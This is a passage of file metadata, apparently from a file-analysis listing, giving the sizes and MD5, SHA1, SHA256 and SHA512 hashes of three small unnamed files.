SHA512c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
-
Filesize
652B
MD516bd7f54a8fe6146a47896dd878b00e3
SHA117ed06452c442a19fb3166fc1579a24e8c1f28fc
SHA2560eef2741e59e0197d975c531c4026fb3e0dcdf52dc9902a17d4946359d062732
SHA512199d5740b153ef1b6eebfa9e3129af8cdfcebbd0adebdfcd6b299c01eee3457930b648612aac1fd767962b46f7acc2b9eec17b0b27dfea9a48f54047e8373a4d
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD568c7cc3e7780b41becfee74cea876520
SHA1fa681f831161f888f3534ae8b0dd41eb3dd45fcc
SHA2567d07a725fe04cdbc13e083382e7c961fd9123d42fdb2efc1d1ac8be518d28734
SHA512df505bd0711c15c29d918142d9db50bb18e542403b91fd8af6f3cad31977761de2e05eae1d2e164cd91a30763993eb34a2bb4f4598813399399654922cff72ab